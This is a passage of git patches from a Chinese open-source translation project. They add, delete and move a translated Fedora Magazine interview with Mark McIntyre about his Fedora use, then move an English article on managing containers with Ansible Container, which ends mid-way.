什么样的硬件和软件? + +McIntyre 将 Fedora Linux 系统用在他的笔记本和台式机上。在服务器上他选择了 CentOS,因为它有更长的生命周期支持。他现在的台式机是自己组装的,配有 Intel 酷睿 i5 处理器,32GB 的内存和2TB 的硬盘。“我装了个 4K 的显示屏,有足够大的,地方来同时查看所有的应用。”他目前工作用的笔记本是戴尔灵越二合一,配备 13 英寸的屏,16 GB 的内存和 525 GB 的 m.2 固态硬盘。 + +![](https://fedoramagazine.org/wp-content/uploads/2017/11/Screenshot-from-2017-10-26-08-51-41-1024x640.png) + +Mark 现在将 Fedora 26 运行在他过去几个月装配的所有盒子中。当一个新版本正式发布的时候,他倾向于避开这个高峰期。“除非在它即将发行的时候,我的工作站中有个正在运行下一代测试版本,通常情况下,一旦它发展成熟,我都会试着去获取最新的版本。”他经常采取就地更新:“这种就地更新方法利用 dnf 系统升级插件,目前表现得非常好。” + +为了搞摄影,McIntyre 用上了 [GIMP][8]、[Darktable][9],以及其他一些照片查看包和快速编辑包。当不启用网络电子邮件时,Mark 会使用 [Geary][10],还有[GNOME Calendar][11]。Mark 选用 HexChat 作为 IRC 客户端,[HexChat][12] 与在 Fedora 服务器实例上运行的 [ZNC bouncer][13] 联机。他的部门通过 Slave 进行沟通交流。 + +“我从来都不是 IDE 粉,所以大多数的编辑任务都是在 [vim][14] 上完成的。”Mark 偶尔也会打开一个简单的文本编辑器,如 [gedit][15],或者 [xed][16]。他用 [GPaste][17] 做复制和粘贴工作。“对于终端的选择,我已经变成 [Tilix][18] 的忠粉。”McIntyre 通过 [Rhythmbox][19] 来管理他喜欢的播客,并用 [Epiphany][20] 实现快速网络查询。 + +-------------------------------------------------------------------------------- + +via: https://fedoramagazine.org/mark-mcintyre-fedora/ + +作者:[Charles Profitt][a] +译者:[zrszrs](https://github.com/zrszrszrs) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://fedoramagazine.org/author/cprofitt/ +[1]:https://fedoramagazine.org/mark-mcintyre-fedora/ +[2]:https://fedoramagazine.org/tag/how-do-you-fedora/ +[3]:https://fedoramagazine.org/submit-an-idea-or-tip/ +[4]:https://knox-pizza-quest.blogspot.com/ +[5]:https://www.flickr.com/photos/mockgeek/ +[6]:http://www.scrippsnetworksinteractive.com/ +[7]:https://fedoraproject.org/wiki/Ambassadors +[8]:https://www.gimp.org/ +[9]:http://www.darktable.org/ +[10]:https://wiki.gnome.org/Apps/Geary +[11]:https://wiki.gnome.org/Apps/Calendar +[12]:https://hexchat.github.io/ +[13]:https://wiki.znc.in/ZNC +[14]:http://www.vim.org/ +[15]:https://wiki.gnome.org/Apps/Gedit +[16]:https://github.com/linuxmint/xed +[17]:https://github.com/Keruspe/GPaste +[18]:https://fedoramagazine.org/try-tilix-new-terminal-emulator-fedora/ +[19]:https://wiki.gnome.org/Apps/Rhythmbox +[20]:https://wiki.gnome.org/Apps/Web From e37682381fa433386398d867ef7cb25ef9f32bb8 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E9=82=B9=E8=8D=A3=E5=8D=87?= Date: Wed, 6 Dec 2017 11:25:16 +0800 Subject: [PATCH 0340/1627] Delete 233 --- translated/tech/233 | 74 --------------------------------------------- 1 file changed, 74 deletions(-) delete mode 100644 translated/tech/233 diff --git a/translated/tech/233 b/translated/tech/233 deleted file mode 100644 index 4fe315eb07..0000000000 --- a/translated/tech/233 +++ /dev/null @@ -1,74 +0,0 @@ -# [Mark McIntyre: 你是如何使用Fedora的?][1] - - -![](https://fedoramagazine.org/wp-content/uploads/2017/11/mock-couch-945w-945x400.jpg) - -最近我们采访了 Mark McIntyre,谈了他是如何使用 Fedora 系统的。这也是 Fedora 杂志上[本系列的一部分][2]。该系列简要介绍了 Fedora 用户,以及他们是如何用 Fedora 把事情做好的。通过[反馈表][3]与我们联系,表达你想成为采访对象的意愿。 - -### Mark McIntyre 是谁? - -Mark McIntyre 是一个天生的极客,后天的 Linux 爱好者。他说:“我在 13 岁开始编程,当时自学 BASIC 语言,我体会到其中的乐趣,并在乐趣的引导下,一步步成为专业的码农。”Mark 和他的侄女都是披萨饼的死忠粉。“去年秋天,我和我的侄女尽可能多地光顾了诺克斯维尔的披萨饼连锁店。 点击 [https://knox-pizza-quest.blogspot.com/][4] 可以了解我们的进展情况。”Mark 也是一名业余的摄影爱好者,并且在 Flickr 上 [发布自己的作品][5]。 - -![](https://fedoramagazine.org/wp-content/uploads/2017/11/31456893222_553b3cac4d_k-1024x575.jpg) - -作为一名开发者,Mark 有着丰富的工作背景。他用过 Visual Basic 编写应用程序,用过 LotusScript、 PL/SQL(Oracle)、 Tcl/TK 编写代码,也用过基于 Python 的 Django 框架。他的强项是 Python。这也是目前他作为系统工程师的工作语言。“我用 Python 比较规律。但当我的工作变得更像是自动化工程师时, Python 用得就更频繁了。” - -McIntyre 自称是个书呆子,喜欢科幻电影,但他最喜欢的一部电影却不是科幻片。“尽管我是个书呆子,喜欢看《星际迷航》、《星球大战》之类的影片,但《光荣战役》或许才是我最喜欢的电影。”他还提到,电影《冲出宁静号》实属著名电视剧《萤火虫》的精彩后续。 - -Mark 比较看重他人的谦逊、知识与和气。他欣赏能够设身处地为他人着想的人。“如果你决定为另一个人服务,那么你会选择自己愿意亲近的人,而不是让自己备受折磨的人。” - -McIntyre 目前在 [Scripps Networks Interactive][6] 工作,这家公司是 HGTV、Food Network、Travel Channel、DIY、GAC 以及其他几个有线电视频道的母公司。“我现在是一名系统工程师,负责非线性视频内容,这是全部媒体开展线上消费的计划。”他支持一些开发团队编写应用程序,将线性视频从有线电视发布到线上平台,比如亚马逊、葫芦。这些系统既包含预置系统,也包含云系统。Mark 还开发了一些自动化工具,将这些应用程序主要部署到云基础结构中。 - -### Fedora 社区 - -Mark 形容 Fedora 社区是一个富有活力的社区,充满着像 Fedora 用户一样热爱生活的人。“从设计师到包装师,这个团体依然非常活跃,生机勃勃。” 他继续说道:“这使我对操作系统抱有一种信心。” - -2002年左右,Mark 开始经常使用 IRC 上的 #fedora 频道:“那时候,Wi-Fi 在启用适配器和配置模块功能时,有许多还是靠手工实现的。”为了让他的 Wi-Fi 能够工作,他不得不重新去编译 Fedora 内核。 - -McIntyre 鼓励他人参与 Fedora 社区。“这里有许多来自不同领域的机会。前端设计、测试部署、开发、应用程序包装以及新型技术实现。”他建议选择一个感兴趣的领域,然后向那个团体提出疑问。“这里有许多机会去奉献自己。” - -对于帮助他起步的社区成员,Mark 赞道:“Ben Williams 非常乐于助人。在我第一次接触 Fedora 时,他帮我搞定了一些 #fedora 支持频道中的安装补丁。” Ben 也鼓励 Mark 去做 Fedora [代表][7]。 - -### 什么样的硬件和软件? - -McIntyre 将 Fedora Linux 系统用在他的笔记本和台式机上。在服务器上他选择了 CentOS,因为它有更长的生命周期支持。他现在的台式机是自己组装的,配有 Intel 酷睿 i5 处理器,32GB 的内存和2TB 的硬盘。“我装了个 4K 的显示屏,有足够大的,地方来同时查看所有的应用。”他目前工作用的笔记本是戴尔灵越二合一,配备 13 英寸的屏,16 GB 的内存和 525 GB 的 m.2 固态硬盘。 - -![](https://fedoramagazine.org/wp-content/uploads/2017/11/Screenshot-from-2017-10-26-08-51-41-1024x640.png) - -Mark 现在将 Fedora 26 运行在他过去几个月装配的所有盒子中。当一个新版本正式发布的时候,他倾向于避开这个高峰期。“除非在它即将发行的时候,我的工作站中有个正在运行下一代测试版本,通常情况下,一旦它发展成熟,我都会试着去获取最新的版本。”他经常采取就地更新:“这种就地更新方法利用 dnf 系统升级插件,目前表现得非常好。” - -为了搞摄影,McIntyre 用上了 [GIMP][8]、[Darktable][9],以及其他一些照片查看包和快速编辑包。当不启用网络电子邮件时,Mark 会使用 [Geary][10],还有[GNOME Calendar][11]。Mark 选用 HexChat 作为 IRC 客户端,[HexChat][12] 与在 Fedora 服务器实例上运行的 [ZNC bouncer][13] 联机。他的部门通过 Slave 进行沟通交流。 - -“我从来都不是 IDE 粉,所以大多数的编辑任务都是在 [vim][14] 上完成的。”Mark 偶尔也会打开一个简单的文本编辑器,如 [gedit][15],或者 [xed][16]。他用 [GPaste][17] 做复制和粘贴工作。“对于终端的选择,我已经变成 [Tilix][18] 的忠粉。”McIntyre 通过 [Rhythmbox][19] 来管理他喜欢的播客,并用 [Epiphany][20] 实现快速网络查询。 - --------------------------------------------------------------------------------- - -via: https://fedoramagazine.org/mark-mcintyre-fedora/ - -作者:[Charles Profitt][a] -译者:[zrszrs](https://github.com/zrszrszrs) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://fedoramagazine.org/author/cprofitt/ -[1]:https://fedoramagazine.org/mark-mcintyre-fedora/ -[2]:https://fedoramagazine.org/tag/how-do-you-fedora/ -[3]:https://fedoramagazine.org/submit-an-idea-or-tip/ -[4]:https://knox-pizza-quest.blogspot.com/ -[5]:https://www.flickr.com/photos/mockgeek/ -[6]:http://www.scrippsnetworksinteractive.com/ -[7]:https://fedoraproject.org/wiki/Ambassadors -[8]:https://www.gimp.org/ -[9]:http://www.darktable.org/ -[10]:https://wiki.gnome.org/Apps/Geary -[11]:https://wiki.gnome.org/Apps/Calendar -[12]:https://hexchat.github.io/ -[13]:https://wiki.znc.in/ZNC -[14]:http://www.vim.org/ -[15]:https://wiki.gnome.org/Apps/Gedit -[16]:https://github.com/linuxmint/xed -[17]:https://github.com/Keruspe/GPaste -[18]:https://fedoramagazine.org/try-tilix-new-terminal-emulator-fedora/ -[19]:https://wiki.gnome.org/Apps/Rhythmbox -[20]:https://wiki.gnome.org/Apps/Web From c36a27b4a041c378eef871c7875e504cbb965b69 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E9=82=B9=E8=8D=A3=E5=8D=87?= Date: Wed, 6 Dec 2017 11:25:47 +0800 Subject: [PATCH 0341/1627] Add files via upload --- ...0171120 Mark McIntyre How Do You Fedora.md | 74 +++++++++++++++++++ 1 file changed, 74 insertions(+) create mode 100644 translated/tech/20171120 Mark McIntyre How Do You Fedora.md diff --git a/translated/tech/20171120 Mark McIntyre How Do You Fedora.md b/translated/tech/20171120 Mark McIntyre How Do You Fedora.md new file mode 100644 index 0000000000..4fe315eb07 --- /dev/null +++ b/translated/tech/20171120 Mark McIntyre How Do You Fedora.md @@ -0,0 +1,74 @@ +# [Mark McIntyre: 你是如何使用Fedora的?][1] + + +![](https://fedoramagazine.org/wp-content/uploads/2017/11/mock-couch-945w-945x400.jpg) + +最近我们采访了 Mark McIntyre,谈了他是如何使用 Fedora 系统的。这也是 Fedora 杂志上[本系列的一部分][2]。该系列简要介绍了 Fedora 用户,以及他们是如何用 Fedora 把事情做好的。通过[反馈表][3]与我们联系,表达你想成为采访对象的意愿。 + +### Mark McIntyre 是谁? + +Mark McIntyre 是一个天生的极客,后天的 Linux 爱好者。他说:“我在 13 岁开始编程,当时自学 BASIC 语言,我体会到其中的乐趣,并在乐趣的引导下,一步步成为专业的码农。”Mark 和他的侄女都是披萨饼的死忠粉。“去年秋天,我和我的侄女尽可能多地光顾了诺克斯维尔的披萨饼连锁店。 点击 [https://knox-pizza-quest.blogspot.com/][4] 可以了解我们的进展情况。”Mark 也是一名业余的摄影爱好者,并且在 Flickr 上 [发布自己的作品][5]。 + +![](https://fedoramagazine.org/wp-content/uploads/2017/11/31456893222_553b3cac4d_k-1024x575.jpg) + +作为一名开发者,Mark 有着丰富的工作背景。他用过 Visual Basic 编写应用程序,用过 LotusScript、 PL/SQL(Oracle)、 Tcl/TK 编写代码,也用过基于 Python 的 Django 框架。他的强项是 Python。这也是目前他作为系统工程师的工作语言。“我用 Python 比较规律。但当我的工作变得更像是自动化工程师时, Python 用得就更频繁了。” + +McIntyre 自称是个书呆子,喜欢科幻电影,但他最喜欢的一部电影却不是科幻片。“尽管我是个书呆子,喜欢看《星际迷航》、《星球大战》之类的影片,但《光荣战役》或许才是我最喜欢的电影。”他还提到,电影《冲出宁静号》实属著名电视剧《萤火虫》的精彩后续。 + +Mark 比较看重他人的谦逊、知识与和气。他欣赏能够设身处地为他人着想的人。“如果你决定为另一个人服务,那么你会选择自己愿意亲近的人,而不是让自己备受折磨的人。” + +McIntyre 目前在 [Scripps Networks Interactive][6] 工作,这家公司是 HGTV、Food Network、Travel Channel、DIY、GAC 以及其他几个有线电视频道的母公司。“我现在是一名系统工程师,负责非线性视频内容,这是全部媒体开展线上消费的计划。”他支持一些开发团队编写应用程序,将线性视频从有线电视发布到线上平台,比如亚马逊、葫芦。这些系统既包含预置系统,也包含云系统。Mark 还开发了一些自动化工具,将这些应用程序主要部署到云基础结构中。 + +### Fedora 社区 + +Mark 形容 Fedora 社区是一个富有活力的社区,充满着像 Fedora 用户一样热爱生活的人。“从设计师到包装师,这个团体依然非常活跃,生机勃勃。” 他继续说道:“这使我对操作系统抱有一种信心。” + +2002年左右,Mark 开始经常使用 IRC 上的 #fedora 频道:“那时候,Wi-Fi 在启用适配器和配置模块功能时,有许多还是靠手工实现的。”为了让他的 Wi-Fi 能够工作,他不得不重新去编译 Fedora 内核。 + +McIntyre 鼓励他人参与 Fedora 社区。“这里有许多来自不同领域的机会。前端设计、测试部署、开发、应用程序包装以及新型技术实现。”他建议选择一个感兴趣的领域,然后向那个团体提出疑问。“这里有许多机会去奉献自己。” + +对于帮助他起步的社区成员,Mark 赞道:“Ben Williams 非常乐于助人。在我第一次接触 Fedora 时,他帮我搞定了一些 #fedora 支持频道中的安装补丁。” Ben 也鼓励 Mark 去做 Fedora [代表][7]。 + +### 什么样的硬件和软件? + +McIntyre 将 Fedora Linux 系统用在他的笔记本和台式机上。在服务器上他选择了 CentOS,因为它有更长的生命周期支持。他现在的台式机是自己组装的,配有 Intel 酷睿 i5 处理器,32GB 的内存和2TB 的硬盘。“我装了个 4K 的显示屏,有足够大的,地方来同时查看所有的应用。”他目前工作用的笔记本是戴尔灵越二合一,配备 13 英寸的屏,16 GB 的内存和 525 GB 的 m.2 固态硬盘。 + +![](https://fedoramagazine.org/wp-content/uploads/2017/11/Screenshot-from-2017-10-26-08-51-41-1024x640.png) + +Mark 现在将 Fedora 26 运行在他过去几个月装配的所有盒子中。当一个新版本正式发布的时候,他倾向于避开这个高峰期。“除非在它即将发行的时候,我的工作站中有个正在运行下一代测试版本,通常情况下,一旦它发展成熟,我都会试着去获取最新的版本。”他经常采取就地更新:“这种就地更新方法利用 dnf 系统升级插件,目前表现得非常好。” + +为了搞摄影,McIntyre 用上了 [GIMP][8]、[Darktable][9],以及其他一些照片查看包和快速编辑包。当不启用网络电子邮件时,Mark 会使用 [Geary][10],还有[GNOME Calendar][11]。Mark 选用 HexChat 作为 IRC 客户端,[HexChat][12] 与在 Fedora 服务器实例上运行的 [ZNC bouncer][13] 联机。他的部门通过 Slave 进行沟通交流。 + +“我从来都不是 IDE 粉,所以大多数的编辑任务都是在 [vim][14] 上完成的。”Mark 偶尔也会打开一个简单的文本编辑器,如 [gedit][15],或者 [xed][16]。他用 [GPaste][17] 做复制和粘贴工作。“对于终端的选择,我已经变成 [Tilix][18] 的忠粉。”McIntyre 通过 [Rhythmbox][19] 来管理他喜欢的播客,并用 [Epiphany][20] 实现快速网络查询。 + +-------------------------------------------------------------------------------- + +via: https://fedoramagazine.org/mark-mcintyre-fedora/ + +作者:[Charles Profitt][a] +译者:[zrszrs](https://github.com/zrszrszrs) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://fedoramagazine.org/author/cprofitt/ +[1]:https://fedoramagazine.org/mark-mcintyre-fedora/ +[2]:https://fedoramagazine.org/tag/how-do-you-fedora/ +[3]:https://fedoramagazine.org/submit-an-idea-or-tip/ +[4]:https://knox-pizza-quest.blogspot.com/ +[5]:https://www.flickr.com/photos/mockgeek/ +[6]:http://www.scrippsnetworksinteractive.com/ +[7]:https://fedoraproject.org/wiki/Ambassadors +[8]:https://www.gimp.org/ +[9]:http://www.darktable.org/ +[10]:https://wiki.gnome.org/Apps/Geary +[11]:https://wiki.gnome.org/Apps/Calendar +[12]:https://hexchat.github.io/ +[13]:https://wiki.znc.in/ZNC +[14]:http://www.vim.org/ +[15]:https://wiki.gnome.org/Apps/Gedit +[16]:https://github.com/linuxmint/xed +[17]:https://github.com/Keruspe/GPaste +[18]:https://fedoramagazine.org/try-tilix-new-terminal-emulator-fedora/ +[19]:https://wiki.gnome.org/Apps/Rhythmbox +[20]:https://wiki.gnome.org/Apps/Web From 3214c62240e148a862536689968d2a4c36efddf7 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E9=82=B9=E8=8D=A3=E5=8D=87?= Date: Wed, 6 Dec 2017 11:27:39 +0800 Subject: [PATCH 0342/1627] Delete 20171120 Mark McIntyre How Do You Fedora.md --- ...0171120 Mark McIntyre How Do You Fedora.md | 74 ------------------- 1 file changed, 74 deletions(-) delete mode 100644 sources/tech/20171120 Mark McIntyre How Do You Fedora.md diff --git a/sources/tech/20171120 Mark McIntyre How Do You Fedora.md b/sources/tech/20171120 Mark McIntyre How Do You Fedora.md deleted file mode 100644 index 4fe315eb07..0000000000 --- a/sources/tech/20171120 Mark McIntyre How Do You Fedora.md +++ /dev/null @@ -1,74 +0,0 @@ -# [Mark McIntyre: 你是如何使用Fedora的?][1] - - -![](https://fedoramagazine.org/wp-content/uploads/2017/11/mock-couch-945w-945x400.jpg) - -最近我们采访了 Mark McIntyre,谈了他是如何使用 Fedora 系统的。这也是 Fedora 杂志上[本系列的一部分][2]。该系列简要介绍了 Fedora 用户,以及他们是如何用 Fedora 把事情做好的。通过[反馈表][3]与我们联系,表达你想成为采访对象的意愿。 - -### Mark McIntyre 是谁? - -Mark McIntyre 是一个天生的极客,后天的 Linux 爱好者。他说:“我在 13 岁开始编程,当时自学 BASIC 语言,我体会到其中的乐趣,并在乐趣的引导下,一步步成为专业的码农。”Mark 和他的侄女都是披萨饼的死忠粉。“去年秋天,我和我的侄女尽可能多地光顾了诺克斯维尔的披萨饼连锁店。 点击 [https://knox-pizza-quest.blogspot.com/][4] 可以了解我们的进展情况。”Mark 也是一名业余的摄影爱好者,并且在 Flickr 上 [发布自己的作品][5]。 - -![](https://fedoramagazine.org/wp-content/uploads/2017/11/31456893222_553b3cac4d_k-1024x575.jpg) - -作为一名开发者,Mark 有着丰富的工作背景。他用过 Visual Basic 编写应用程序,用过 LotusScript、 PL/SQL(Oracle)、 Tcl/TK 编写代码,也用过基于 Python 的 Django 框架。他的强项是 Python。这也是目前他作为系统工程师的工作语言。“我用 Python 比较规律。但当我的工作变得更像是自动化工程师时, Python 用得就更频繁了。” - -McIntyre 自称是个书呆子,喜欢科幻电影,但他最喜欢的一部电影却不是科幻片。“尽管我是个书呆子,喜欢看《星际迷航》、《星球大战》之类的影片,但《光荣战役》或许才是我最喜欢的电影。”他还提到,电影《冲出宁静号》实属著名电视剧《萤火虫》的精彩后续。 - -Mark 比较看重他人的谦逊、知识与和气。他欣赏能够设身处地为他人着想的人。“如果你决定为另一个人服务,那么你会选择自己愿意亲近的人,而不是让自己备受折磨的人。” - -McIntyre 目前在 [Scripps Networks Interactive][6] 工作,这家公司是 HGTV、Food Network、Travel Channel、DIY、GAC 以及其他几个有线电视频道的母公司。“我现在是一名系统工程师,负责非线性视频内容,这是全部媒体开展线上消费的计划。”他支持一些开发团队编写应用程序,将线性视频从有线电视发布到线上平台,比如亚马逊、葫芦。这些系统既包含预置系统,也包含云系统。Mark 还开发了一些自动化工具,将这些应用程序主要部署到云基础结构中。 - -### Fedora 社区 - -Mark 形容 Fedora 社区是一个富有活力的社区,充满着像 Fedora 用户一样热爱生活的人。“从设计师到包装师,这个团体依然非常活跃,生机勃勃。” 他继续说道:“这使我对操作系统抱有一种信心。” - -2002年左右,Mark 开始经常使用 IRC 上的 #fedora 频道:“那时候,Wi-Fi 在启用适配器和配置模块功能时,有许多还是靠手工实现的。”为了让他的 Wi-Fi 能够工作,他不得不重新去编译 Fedora 内核。 - -McIntyre 鼓励他人参与 Fedora 社区。“这里有许多来自不同领域的机会。前端设计、测试部署、开发、应用程序包装以及新型技术实现。”他建议选择一个感兴趣的领域,然后向那个团体提出疑问。“这里有许多机会去奉献自己。” - -对于帮助他起步的社区成员,Mark 赞道:“Ben Williams 非常乐于助人。在我第一次接触 Fedora 时,他帮我搞定了一些 #fedora 支持频道中的安装补丁。” Ben 也鼓励 Mark 去做 Fedora [代表][7]。 - -### 什么样的硬件和软件? - -McIntyre 将 Fedora Linux 系统用在他的笔记本和台式机上。在服务器上他选择了 CentOS,因为它有更长的生命周期支持。他现在的台式机是自己组装的,配有 Intel 酷睿 i5 处理器,32GB 的内存和2TB 的硬盘。“我装了个 4K 的显示屏,有足够大的,地方来同时查看所有的应用。”他目前工作用的笔记本是戴尔灵越二合一,配备 13 英寸的屏,16 GB 的内存和 525 GB 的 m.2 固态硬盘。 - -![](https://fedoramagazine.org/wp-content/uploads/2017/11/Screenshot-from-2017-10-26-08-51-41-1024x640.png) - -Mark 现在将 Fedora 26 运行在他过去几个月装配的所有盒子中。当一个新版本正式发布的时候,他倾向于避开这个高峰期。“除非在它即将发行的时候,我的工作站中有个正在运行下一代测试版本,通常情况下,一旦它发展成熟,我都会试着去获取最新的版本。”他经常采取就地更新:“这种就地更新方法利用 dnf 系统升级插件,目前表现得非常好。” - -为了搞摄影,McIntyre 用上了 [GIMP][8]、[Darktable][9],以及其他一些照片查看包和快速编辑包。当不启用网络电子邮件时,Mark 会使用 [Geary][10],还有[GNOME Calendar][11]。Mark 选用 HexChat 作为 IRC 客户端,[HexChat][12] 与在 Fedora 服务器实例上运行的 [ZNC bouncer][13] 联机。他的部门通过 Slave 进行沟通交流。 - -“我从来都不是 IDE 粉,所以大多数的编辑任务都是在 [vim][14] 上完成的。”Mark 偶尔也会打开一个简单的文本编辑器,如 [gedit][15],或者 [xed][16]。他用 [GPaste][17] 做复制和粘贴工作。“对于终端的选择,我已经变成 [Tilix][18] 的忠粉。”McIntyre 通过 [Rhythmbox][19] 来管理他喜欢的播客,并用 [Epiphany][20] 实现快速网络查询。 - --------------------------------------------------------------------------------- - -via: https://fedoramagazine.org/mark-mcintyre-fedora/ - -作者:[Charles Profitt][a] -译者:[zrszrs](https://github.com/zrszrszrs) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://fedoramagazine.org/author/cprofitt/ -[1]:https://fedoramagazine.org/mark-mcintyre-fedora/ -[2]:https://fedoramagazine.org/tag/how-do-you-fedora/ -[3]:https://fedoramagazine.org/submit-an-idea-or-tip/ -[4]:https://knox-pizza-quest.blogspot.com/ -[5]:https://www.flickr.com/photos/mockgeek/ -[6]:http://www.scrippsnetworksinteractive.com/ -[7]:https://fedoraproject.org/wiki/Ambassadors -[8]:https://www.gimp.org/ -[9]:http://www.darktable.org/ -[10]:https://wiki.gnome.org/Apps/Geary -[11]:https://wiki.gnome.org/Apps/Calendar -[12]:https://hexchat.github.io/ -[13]:https://wiki.znc.in/ZNC -[14]:http://www.vim.org/ -[15]:https://wiki.gnome.org/Apps/Gedit -[16]:https://github.com/linuxmint/xed -[17]:https://github.com/Keruspe/GPaste -[18]:https://fedoramagazine.org/try-tilix-new-terminal-emulator-fedora/ -[19]:https://wiki.gnome.org/Apps/Rhythmbox -[20]:https://wiki.gnome.org/Apps/Web From 78162279e7912c78582a2f42a05e7f930836a139 Mon Sep 17 00:00:00 2001 From: qhwdw Date: Wed, 6 Dec 2017 11:58:01 +0800 Subject: [PATCH 0343/1627] Translated by qhwdw --- ...Linux containers with Ansible Container.md | 114 ----------------- ...Linux containers with Ansible Container.md | 116 ++++++++++++++++++ 2 files changed, 116 insertions(+), 114 deletions(-) delete mode 100644 sources/tech/20171005 How to manage Linux containers with Ansible Container.md create mode 100644 translated/tech/20171005 How to manage Linux containers with Ansible Container.md diff --git a/sources/tech/20171005 How to manage Linux containers with Ansible Container.md b/sources/tech/20171005 How to manage Linux containers with Ansible Container.md deleted file mode 100644 index 0f200d73a8..0000000000 --- a/sources/tech/20171005 How to manage Linux containers with Ansible Container.md +++ /dev/null @@ -1,114 +0,0 @@ -Translating by qhwdw How to manage Linux containers with Ansible Container -============================================================ - -### Ansible Container addresses Dockerfile shortcomings and offers complete management for containerized projects. - -![Ansible Container: A new way to manage containers](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/container-ship.png?itok=pqZYgQ7K "Ansible Container: A new way to manage containers") -Image by : opensource.com - -I love containers and use the technology every day. Even so, containers aren't perfect. Over the past couple of months, however, a set of projects has emerged that addresses some of the problems I've experienced. - -I started using containers with [Docker][11], since this project made the technology so popular. Aside from using the container engine, I learned how to use **[docker-compose][6]** and started managing my projects with it. My productivity skyrocketed! One command to run my project, no matter how complex it was. I was so happy. - -After some time, I started noticing issues. The most apparent were related to the process of creating container images. The Docker tool uses a custom file format as a recipe to produce container images—Dockerfiles. This format is easy to learn, and after a short time you are ready to produce container images on your own. The problems arise once you want to master best practices or have complex scenarios in mind. - -More on Ansible - -* [How Ansible works][1] - -* [Free Ansible eBooks][2] - -* [Ansible quick start video][3] - -* [Download and install Ansible][4] - -Let's take a break and travel to a different land: the world of [Ansible][22]. You know it? It's awesome, right? You don't? Well, it's time to learn something new. Ansible is a project that allows you to manage your infrastructure by writing tasks and executing them inside environments of your choice. No need to install and set up any services; everything can easily run from your laptop. Many people already embrace Ansible. - -Imagine this scenario: You invested in Ansible, you wrote plenty of Ansible roles and playbooks that you use to manage your infrastructure, and you are thinking about investing in containers. What should you do? Start writing container image definitions via shell scripts and Dockerfiles? That doesn't sound right. - -Some people from the Ansible development team asked this question and realized that those same Ansible roles and playbooks that people wrote and use daily can also be used to produce container images. But not just that—they can be used to manage the complete lifecycle of containerized projects. From these ideas, the [Ansible Container][12] project was born. It utilizes existing Ansible roles that can be turned into container images and can even be used for the complete application lifecycle, from build to deploy in production. - -Let's talk about the problems I mentioned regarding best practices in context of Dockerfiles. A word of warning: This is going to be very specific and technical. Here are the top three issues I have: - -### 1\. Shell scripts embedded in Dockerfiles. - -When writing Dockerfiles, you can specify a script that will be interpreted via **/bin/sh -c**. It can be something like: - -``` -RUN dnf install -y nginx -``` - -where RUN is a Dockerfile instruction and the rest are its arguments (which are passed to shell). But imagine a more complex scenario: - -``` -RUN set -eux; \ -    \ -# this "case" statement is generated via "update.sh" -    %%ARCH-CASE%%; \ -    \ -    url="https://golang.org/dl/go${GOLANG_VERSION}.${goRelArch}.tar.gz"; \ -    wget -O go.tgz "$url"; \ -    echo "${goRelSha256} *go.tgz" | sha256sum -c -; \ -``` - -This one is taken from [the official golang image][13]. It doesn't look pretty, right? - -### 2\. You can't parse Dockerfiles easily. - -Dockerfiles are a new format without a formal specification. This is tricky if you need to process Dockerfiles in your infrastructure (e.g., automate the build process a bit). The only specification is [the code][14] that is part of **dockerd**. The problem is that you can't use it as a library. The easiest solution is to write a parser on your own and hope for the best. Wouldn't it be better to use some well-known markup language, such as YAML or JSON? - -### 3\. It's hard to control. - -If you are familiar with the internals of container images, you may know that every image is composed of layers. Once the container is created, the layers are stacked onto each other (like pancakes) using union filesystem technology. The problem is, that you cannot explicitly control this layering—you can't say, "here starts a new layer." You are forced to change your Dockerfile in a way that may hurt readability. The bigger problem is that a set of best practices has to be followed to achieve optimal results—newcomers have a really hard time here. - -### Comparing Ansible language and Dockerfiles - -The biggest shortcoming of Dockerfiles in comparison to Ansible is that Ansible, as a language, is much more powerful. For example, Dockerfiles have no direct concept of variables, whereas Ansible has a complete templating system (variables are just one of its features). Ansible contains a large number of modules that can be easily utilized, such as [**wait_for**][15], which can be used for service readiness checks—e.g., wait until a service is ready before proceeding. With Dockerfiles, everything is a shell script. So if you need to figure out service readiness, it has to be done with shell (or installed separately). The other problem with shell scripts is that, with growing complexity, maintenance becomes a burden. Plenty of people have already figured this out and turned those shell scripts into Ansible. - -If you are interested in this topic and would like to know more, please come to [Open Source Summit][16] in Prague to see [my presentation][17] on Monday, Oct. 23, at 4:20 p.m. in Palmovka room. - - _Learn more in Tomas Tomecek's talk, [From Dockerfiles to Ansible Container][7], at [Open Source Summit EU][8], which will be held October 23-26 in Prague._ - - - -### About the author - - [![human](https://opensource.com/sites/default/files/styles/profile_pictures/public/pictures/ja.jpeg?itok=4ATUEAbd)][18] Tomas Tomecek - Engineer. Hacker. Speaker. Tinker. Red Hatter. Likes containers, linux, open source, python 3, rust, zsh, tmux.[More about me][9] - --------------------------------------------------------------------------------- - -via: https://opensource.com/article/17/10/dockerfiles-ansible-container - -作者:[Tomas Tomecek ][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://opensource.com/users/tomastomecek -[1]:https://www.ansible.com/how-ansible-works?intcmp=701f2000000h4RcAAI -[2]:https://www.ansible.com/ebooks?intcmp=701f2000000h4RcAAI -[3]:https://www.ansible.com/quick-start-video?intcmp=701f2000000h4RcAAI -[4]:https://docs.ansible.com/ansible/latest/intro_installation.html?intcmp=701f2000000h4RcAAI -[5]:https://opensource.com/article/17/10/dockerfiles-ansible-container?imm_mid=0f9013&cmp=em-webops-na-na-newsltr_20171201&rate=Wiw_0D6PK_CAjqatYu_YQH0t1sNHEF6q09_9u3sYkCY -[6]:https://github.com/docker/compose -[7]:http://sched.co/BxIW 